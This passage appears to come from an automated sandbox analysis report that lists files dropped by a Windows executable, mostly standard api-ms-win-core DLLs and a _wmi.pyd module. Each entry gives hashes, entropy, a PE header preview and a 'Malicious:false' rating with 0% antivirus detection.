                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I.^.(k..(k..(k..P...(k...j..(k...h..(k...o..(k...n..(k..j..(k...j..(k..(j..)k..Pj..(k..f..(k..k..(k.....(k..i..(k.Rich.(k.........PE..d....g.f.........." ...).............,...................................................`.............................................d...T...................D......../......x...p...T...........................0...@............................................text...D........................... ..`.rdata..x".......$..................@..@.data...p...........................@....pdata..D............`..............@..@.rsrc................l..............@..@.reloc..x............v..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_wmi.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):38168
                                                                                                                                                                                                                          Entropy (8bit):6.338968434676258
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:kEkKWSx+lZb+7iNEpPlFIvCiS5YiSyvxPAMxkERJ:kE9W5XyiNEvFIvCiQ7SyJPxj
                                                                                                                                                                                                                          MD5:FDA7D7AADA1D15CAB2ADD2F4BD2E59A1
                                                                                                                                                                                                                          SHA1:7E61473F2AD5E061EF59105BF4255DBE7DB5117A
                                                                                                                                                                                                                          SHA-256:B0ED1C62B73B291A1B57E3D8882CC269B2FCBB1253F2947DA18D9036E0C985D9
                                                                                                                                                                                                                          SHA-512:95C2934A75507EA2D8C817DA7E76EE7567EC29A52018AEF195FAC779B7FFB440C27722D162F8E416B6EF5D3FD0936C71A55776233293B3DD0124D51118A2B628
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H2.&a.&a.&a..a.&a..'`.&a..%`.&a.."`.&a..'`.&a..#`.&a..'`.&a.'a..&a.."`.&a../`.&a..&`.&a...a.&a..$`.&aRich.&a................PE..d....g.f.........." ...).,...<.......)..............................................Y.....`.........................................0V..H...xV.......................f.../......t...tG..T............................C..@............@.......T..@....................text....*.......,.................. ..`.rdata..d ...@..."...0..............@..@.data........p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc..t............d..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-console-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19136
                                                                                                                                                                                                                          Entropy (8bit):6.970714443823879
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:pTLPWEhWEedqH8z79YOCAs/nGfe4pBjS7FdzkWYyieHaVWQ4SWwh6qnajig64BMX:JWEhWwc6A0GftpBjbg6fh6lurqMu5Zq
                                                                                                                                                                                                                          MD5:014AF7FC0A314E14F5F72E81ED5286B8
                                                                                                                                                                                                                          SHA1:C64AD8E342B37A634C60A98FC8B87E325E6BDFD7
                                                                                                                                                                                                                          SHA-256:34D8BBFCFE575279B4839EF71533EE3552A90EF6B8A33CCAEA7B3A96A8EF7CC2
                                                                                                                                                                                                                          SHA-512:D1EA5214808B3F942BAF69D3B7851F719C780CA8B33C40F1D0B88192983767E868C80508E59B5BE3A6DA2B7025F76FF5D9B796308D0BD08DC4499BB2FC2ADD45
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......p....`.........................................`...+............ ...................<..............8............................................................................rdata..@...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18624
                                                                                                                                                                                                                          Entropy (8bit):6.977861217952774
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:fPWEhW/TzvXS9YOCAs/nGfe4pBjSf/uSWYyieHaVWQ4mW4XeqnajbvTM9UNCD2:HWEhWbzv9A0GftpBjUg6YlPACNCK
                                                                                                                                                                                                                          MD5:9F5BD748E1D5135935B5E37DB76C4536
                                                                                                                                                                                                                          SHA1:84A91AC645DA9B004AB9FEEAB46E1C4B93E4BF4F
                                                                                                                                                                                                                          SHA-256:EE4C248EF69285CE873748DAAAD48355EE5F4A07B6A9B315848CBB51DA5F75EC
                                                                                                                                                                                                                          SHA-512:2C9936479980172C35D74B37C8F8AE5C882517FE80015EE2069AB03522DD5D47D46A9E3CF0BC08F79547C0675C85EF067537BF1049BFC6B0957EA1CADAB8FD37
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......s....`.........................................`................ ...................<..............8............................................................................rdata..$...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-debug-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18624
                                                                                                                                                                                                                          Entropy (8bit):6.991423107868228
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:FPWEhWEAco9h9YOCAs/nGfe4pBjS7CJRZvWYyieHaVWQ4SWWlqnajig64BMu5j:NWEhWj9EA0GftpBjZJRXg6TlurqMu5j
                                                                                                                                                                                                                          MD5:93CB42CDAA2B39D0DB24CDD2F0424755
                                                                                                                                                                                                                          SHA1:CB436ABF3E7DE9794B68224C4A71783206CD3010
                                                                                                                                                                                                                          SHA-256:062EEBB21FB815A5F04CD40D6A18F34FDA54B0874825B458CA1A7E8389175F51
                                                                                                                                                                                                                          SHA-512:915388069B56DEF30A2F2DD3176E7EEF0BF1CC4317AF4B15E276F41B1AEB771552A6BB53282CC376DFCC4613FC95C48755BEE4B4DB02ADE739BA5DABAFDD0DE3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......-....`.........................................`................ ...................<..............8............................................................................rdata..0...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18624
                                                                                                                                                                                                                          Entropy (8bit):7.019434628742449
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:PvfC5WEhWY9EA0GftpBjgCXnAg6RlurqMu5zuq:Pi5ciDAg7ru5zj
                                                                                                                                                                                                                          MD5:C2682307BF81DAD53677995C76798B0E
                                                                                                                                                                                                                          SHA1:723F6C937B72AB06678B48A7A9F2AE1392B2E49A
                                                                                                                                                                                                                          SHA-256:4084E648B26B93D6A5A935198FA3156C5D3455ECE6776548F6C25334684CC628
                                                                                                                                                                                                                          SHA-512:92E19F1D8C0F02AA4272AC7E6469EAED1787ACD9AC45011BA1B6A36D23FD50617F39E96EE73730515CE6A58006689CAB6F99279ABA280621EAEF4C491DDC6135
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......|.....`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):22208
                                                                                                                                                                                                                          Entropy (8bit):6.918365136168789
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:1BPvVX7WEhWG9EA0GftpBj7g6klurqMu5Q:rPvVXDGiBgCru5Q
                                                                                                                                                                                                                          MD5:F5D509A996E81A628D9F8E34EA05ADF7
                                                                                                                                                                                                                          SHA1:A436433B4C71E191A4F1C79DE70C36C3C31984C7
                                                                                                                                                                                                                          SHA-256:E6BEF4D6B566DFBDA75DEFAB9229E11FC0F165AEE0CEB594BDD5059D749E14AB
                                                                                                                                                                                                                          SHA-512:2334C80CD897701ED98D378BDF6A9A17CFB0BB59D51F974D9C7883FCF73C4251B38464C7B4DD1D29EB3BF93AD9EC85FA25B3440C426B7F14799FBDDF73CD37D7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................@.......^....`.........................................`................0...................<..............8............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18624
                                                                                                                                                                                                                          Entropy (8bit):6.990654011713193
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:lXhPWEhW/tdqH8z79YOCAs/nGfe4pBjSfSO28vgWYyieHaVWQ4mWgQqnajbvTM9O:lZWEhWyc6A0GftpBj7Ol6g6SlPACN6pu
                                                                                                                                                                                                                          MD5:63F88FA59F6CED6EC5BC50B5407B1FC2
                                                                                                                                                                                                                          SHA1:9806CD443812E7939C4D95E3C583C2785EA165B1
                                                                                                                                                                                                                          SHA-256:A179666B529FC407FD16BE148F5F221FD7774773E80A94D747091ACA7D390DA4
                                                                                                                                                                                                                          SHA-512:BEF016E0CCCB71AB6EFD357BBCC3E4F03FE8CB1392E022689AEE2048AFA3F20192DD2B1496D763CDEA81264C644BD30CD40C7976D95EBF27882ED434B74E03E9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......O.....`.........................................`...L............ ...................<..............8............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18624
                                                                                                                                                                                                                          Entropy (8bit):7.058416036715907
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:sVxWEhWywIp68A0GftpBjQ5g6qlurqMu53b:sVhTiygIru5L
                                                                                                                                                                                                                          MD5:5B99824D6509FE5B4F0DC09C3706E4B9
                                                                                                                                                                                                                          SHA1:D5B08505F9359BE50F45449B7D46DA42B00DA7C7
                                                                                                                                                                                                                          SHA-256:2771BF5156CDAF5DDDC234254DC200064C2643EA2368807A965F5574153B4C08
                                                                                                                                                                                                                          SHA-512:F5C604D95B056B71D801AC9B84D7127718CD9CFAB8FFFB7524C9C8A919E8A24E3B55D618931302C4BE83560BC95871DB6ECB9EC79FA254E235BEE55D32036E67
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...).NV.........." .........................................................0......3+....`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18624
                                                                                                                                                                                                                          Entropy (8bit):6.999212111686368
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:1PWEhWEGjvYIp6Z9YOCAs/nGfe4pBjS7+g3WYyieHaVWQ4SWfqnaj2Zl7F91VpJn:9WEhWVwIp68A0GftpBjzgtg6ilSFjVIy
                                                                                                                                                                                                                          MD5:910DBE369BACE67BFAEFEA6152B11050
                                                                                                                                                                                                                          SHA1:86002FCA6B22D45E26C95E613815589A5E65E997
                                                                                                                                                                                                                          SHA-256:69A3044E9FE8EB51C639EA6B22B8AEAB207ABABC7C6FE2220E8D26AAA39203CE
                                                                                                                                                                                                                          SHA-512:502B52BDA4785CD43030733990C541A193CC9BEB207F0F42F7A81D5ECAB08EF918E4334D24E28732FA7F08B6B3D6F2178033EDCF3FF4C198F12AFCCC8B1DBCC1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`..._............ ...................<..............8............................................................................rdata..t...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19136
                                                                                                                                                                                                                          Entropy (8bit):6.9632378140936995
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:KZlrPWEhWurpdqH8z79YOCAs/nGfe4pBjSbFz3OWYyieHaVWQ42W75qnajY1n+he:QlzWEhWxc6A0GftpBj4zkg6C5lcEb0r
                                                                                                                                                                                                                          MD5:BED468F0C1A1F8358DC24B6E4C3C640E
                                                                                                                                                                                                                          SHA1:3EC513F2E2763D67F86F004683F17EE9923AF2C9
                                                                                                                                                                                                                          SHA-256:B5FD420888D1FBC706608802D614ECCBE456D665EE5782E0AE4BC58A494032B3
                                                                                                                                                                                                                          SHA-512:82DDC4826FE57EE920A99E7608021596F7A2703656942E3D7D706C65D2CC6D99695BD33F4B3EF7D8DD66987AE7EC908796454A442C7D5AC56455A2F960BBB354
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18624
                                                                                                                                                                                                                          Entropy (8bit):7.012698961057848
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:SPWEhWESzvXS9YOCAs/nGfe4pBjS7PooMWYyieHaVWQ4SW5qnajig64BMu5aM:WWEhWxzv9A0GftpBjHg6SlurqMu5f
                                                                                                                                                                                                                          MD5:0977FE53A468F27750EC2DC76790EEDA
                                                                                                                                                                                                                          SHA1:8A983E2936DCEAE3296D66E3A2D37F40A310DABA
                                                                                                                                                                                                                          SHA-256:C2DADBB53D2F6921BA882CED0E0AFA9F841CE2FE4646BF829C038DBA94E18080
                                                                                                                                                                                                                          SHA-512:EA61FCB67F3D456313157A0E27DA07714526B81F6C5D7F8F17975540E249F3E840AC5D0FEC7C8D3F174BBD39819E6E0CCE8533D14518337514D7F63FC9A35AE4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19136
                                                                                                                                                                                                                          Entropy (8bit):7.020518820666579
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:yvuBL3BXWEhWqzv9A0GftpBjhQfXg6DlPACN/EE:9BL3B3hJisgdo/d
                                                                                                                                                                                                                          MD5:088C8F4C4EF87B04376DFCBA789083AB
                                                                                                                                                                                                                          SHA1:ECD72EA919B5E3171141C1F4F5CB5399C6DB17F2
                                                                                                                                                                                                                          SHA-256:D90E6FC57EFB8CEE29DD81591E4A4C9D449208C87C632FCE3633EFB865A69A65
                                                                                                                                                                                                                          SHA-512:0D64DDEC81342024D3613E99D2012ED912E3C36CC16B65A341D178FE6D3E77CA41CFC0A141E09E17F0AEC82D7563D0C6328F456DAD680E3FE1421B94A0A56290
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......~.....`.........................................`................ ...................<..............8............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):21184
                                                                                                                                                                                                                          Entropy (8bit):6.994711200989843
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:LOMw3zdp3bwjGjue9/0jCRrndbkWEhWn9EA0GftpBj0bg6flPACN1:LOMwBprwjGjue9/0jCRrndby7isgRo1
                                                                                                                                                                                                                          MD5:5D32A3644D850032038B55546B6D6665
                                                                                                                                                                                                                          SHA1:FAEEB777CE0AF9716E0E534BA3846051E52E3AB6
                                                                                                                                                                                                                          SHA-256:BC3972EA34C0DF384E6B1196CDF88C805F7363949E7C92D5CF457FA5114D4512
                                                                                                                                                                                                                          SHA-512:A14B10468159B67FF7AF52F7C8248995D528341000718069734017A079278D0248D76B369DAD8B1C20F0B4480AE55D9E5B48DED02A12A83A943DEF9A4CC3436D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......]....`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19136
                                                                                                                                                                                                                          Entropy (8bit):6.982863770252121
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:4mPWEhWERdqH8z79YOCAs/nGfe4pBjS7szH4nKWYyieHaVWQ4SWYiXqqnajGppom:4qWEhWfc6A0GftpBjPtg6fi6lCXSMW70
                                                                                                                                                                                                                          MD5:DC54CC3450E734928FA426C7578EFE31
                                                                                                                                                                                                                          SHA1:8FC7244EB0B7F5E823AC93483680FB9342CBF86C
                                                                                                                                                                                                                          SHA-256:1BCE3EDE03AF435397023C8BF2A7297381A8E7EE191CCDC8BB51E124A4871698
                                                                                                                                                                                                                          SHA-512:03EFEAAEB87B013DBAE583AD130902727D24B87625F1BD91BAD3FD9C0EEC5874521706DEB16FD31A681EC438841D7F54C54E23E3612FDF90F4458162635E7A2C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...l............ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18624
                                                                                                                                                                                                                          Entropy (8bit):7.051462561061091
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:ZRQPWEhWE8co9h9YOCAs/nGfe4pBjS74fhiLfXWYyieHaVWQ4SWPcqnajGppo/Me:kWEhWT9EA0GftpBjtfhqg65lCXSMe
                                                                                                                                                                                                                          MD5:4F38355AE5E8D3F88956D59A7F69465F
                                                                                                                                                                                                                          SHA1:ABAF9D0C42F7E9EB0C2D2E29F7169B6A64C19739
                                                                                                                                                                                                                          SHA-256:3A39CB8DF374801700D491436D740DF373623D4740771019C1146E15A9235FFC
                                                                                                                                                                                                                          SHA-512:92D5603162E3E93A013CD84AC1B74821678475063377249E0122B8AC8DBC1D3DD0C218CE97CBA9F1CBDB2CFF9E055B6246EDE292D401968A13242389F584F5F9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......N....`.........................................`................ ...................<..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19648
                                                                                                                                                                                                                          Entropy (8bit):6.965522501194684
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:tSPWEhW/bco9h9YOCAs/nGfe4pBjSf7FmPcZWYyieHaVWQ4mWLRcVdqnajbvTM9B:tWWEhWT9EA0GftpBjwIP2g60+jlPACNq
                                                                                                                                                                                                                          MD5:85AB69F4B594E8AE057267415ED97850
                                                                                                                                                                                                                          SHA1:97A96731E5CA7F2BFAF72E128E1CE3B8D2B59D8C
                                                                                                                                                                                                                          SHA-256:F37E8F33ABCE833F5D98C8F406CA9276D6832820DFC99A12A636883D40B7F714
                                                                                                                                                                                                                          SHA-512:A91E0D64237165E245B283218A6535BFF16F7A9F68E4869FBBAB8473E1A2A12EE977C9E236DCCFC6E2F1F28040350851515BDC81C3463862CD26E38F89CABF71
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`...G............ ...................<..............8............................................................................rdata..h...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):20672
                                                                                                                                                                                                                          Entropy (8bit):6.9966835226552915
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:0WXk1JzNcKSImWEhWIzv9A0GftpBjkg6sl5AOy:0bcKSdDJiGgcx
                                                                                                                                                                                                                          MD5:F855A04A7EB7AE1C5756CEA828B1ABD8
